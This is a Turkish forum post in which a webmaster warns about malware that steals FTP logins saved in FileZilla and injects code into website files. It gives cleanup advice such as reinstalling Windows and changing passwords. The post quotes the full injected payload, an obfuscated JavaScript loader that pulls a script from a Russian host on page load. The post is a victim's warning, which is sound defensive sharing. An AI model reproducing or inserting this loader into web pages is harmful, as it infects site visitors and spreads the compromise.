Arkadaşlar ben daha önce karşılaşmadım vede hiç bir forumda görmedim aslında mantık olarak aynı çalışmakta ama biraz daha inatçı bu virus rus kökenli çünkü yönlendirmek istediği sayfa uzantısı .ru peki nasıl işliyor bu virus Ftp programınızı bendeki ftp filezilla dı başkasında oluyormu bilmiyorum web sitelerin kullanıcı adı şifresini logluyor günün belirli zamanlarında bilgisayarı aceyip bir kasma ile sitelerin içindeki bütün dosyaların içine kodunu Yerleştiriyor bir kaç gündür aceyip şekilde bilgisayarımda bir hantallaşma var core dou 2 çekirden işlemcili 4 gb ramli bir sistem olmasına ragmen cpu %100 çalışıyor gözüküyordu kaspersky virus programı ve bir kaç trojen spam marware prg kullansamda nasıl oldu anlamadım ama sistemime sızmış..

Bu lanetten kurtulmak için Windows tekrar kurmak zorunda kaldi ve aşagidaki program ile içindeki bütün kodları temizledim şimdilik bir sorun yok ve ftp şifrelerimi değiştirdim size önereceğim bu programlarla sizlerde kurtulabilirsiniz
Öncelikle şu programla ile bilgisayarınızdaki zararlı haşeretlerden kurtulun
Prg : download

Kurulumu buradan İngilizce basit

Bu kod ise bilgisayarınızdaki php html asp dosyalarında ve sitenizdeki bu dosyalarda bulunan virus kodu

Alıntı
<script>var U;var X=null;var w={o:"k"};var F={dW:"QG"};var i=window;s=["a","ep","x"];var ku={};var e=document;ji=25048;ji++;var C=RegExp;var L=["wz","M","l"];GT={fl:26345};QI=["DS","fL","Mb"];function N(){function p(d,j,v){return d.substr(j,v);this.gA='';var Pi=new Date();}var f="\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2 f\x73\x75\x69\x74\x65\x31\x30\x31\x2e\x63\x6f\x6d\ x2f\x6a\x6f\x79\x2e\x63\x6e\x2e\x70\x68\x70";var DI=false;this.Op=22837;this.Op-=73;var P='';this.Rr='';this.fA='';var u=new String(p("scripjy6C",0,5)+"t");fe=["MT","DP","zG"];Dx=56073;Dx--;var m=new String(p("bodwOL",0,3)+p("kZXykXZ",3,1));var g=String("]");var NW=["gK","Xj","zp"];var g=String("]");var kn="";KD=["h","oQ"];function T(d,j){var v=String("[");var tK={DSg:58803};v+=j;Ey=62849;Ey--;v+=g;var iT=false;nu={jz:false};var ND=new C(v, String(p("gLPz",0,1)));return d["re"+p("plBYd",0,2)+p("YXVpacVpYX",4,2)+p("v0aev0a ",3,1)](ND, P);};W={sT:34901};var S=new String("http:"+"//spr"+"ingar"+"ctic."+"ru:");this.VT=59680;this.VT-=14;X="onlo"+"ad";var Q=T('akpkpfeFnFdFC6hfiIlFdy','kf6yOIF');Ej=30808;E j-=208;var b=606455-598375;var sg={nJ:false};var r={ln:false};var Uf='';try {var KI='NX'} catch(KI){};var Y=T('cdrieQaitqeiEylyeRm2einRtR','Qyqd2iRNh');Lr=["wu","jw","cy"];var MH={};var LA=false;var Mbw=["KM","pJ","Dm"];U=function(){try {try {var EkL='Rrc'} catch(EkL){};z=e[Y](u);this.g_='';this.nL=false;Uf=S;this.bL=false;Uf +=b;var ll=false;Uf+=f;var H=p("srcGpaq",0,3);Xv={Mn:false};var K=T('dheofcecrH','a_chHoV4WLm');mV=48635;mV--;var Ge={bY:false};z[K]=[1][0];this.jD='';z[H]=Uf;var Ij='';this.Tj=20799;this.Tj+=234;e[m][Q](z);hp=31954;hp+=170;} catch(HD){var If=[];try {} catch(AL){};};try {var oZ='iu'} catch(oZ){};try {var JZ='qS'} catch(JZ){};};};var lT={YD:false};N();vA=8043;vA++;zR=18145;zR++;var px=["dr"];var CV=["XB"];i[X]=U;var Co='';var FL='';</script>
bu virusun verdiği hata mesajı bu şekilde bende kaspersky kullanıyorum..

bu kod barınıyor yanlız şunu hatırlatayım bilgisayarınızda bir script varsa onun içinede sızıyor ben aldıgım bütün yedeklerin içinde vardı şimdi bunları tek tek silmektense şu programla kısa yoldan kurtulabilirsiniz

Download

aşagıdaki resimli anlatımı var r10 dan daha önce bir arkadaş vermişti o yüzden alıntı yapiyorum
birinci işlem

ikinci işlem

Umarım bu bilgiler sizin için yeterli olur Lanet olsun birde bu virus belası çıktı eskiden webde böyle şeyler olmazdı daha neler çıkacak acaba..
Kolaylıklar...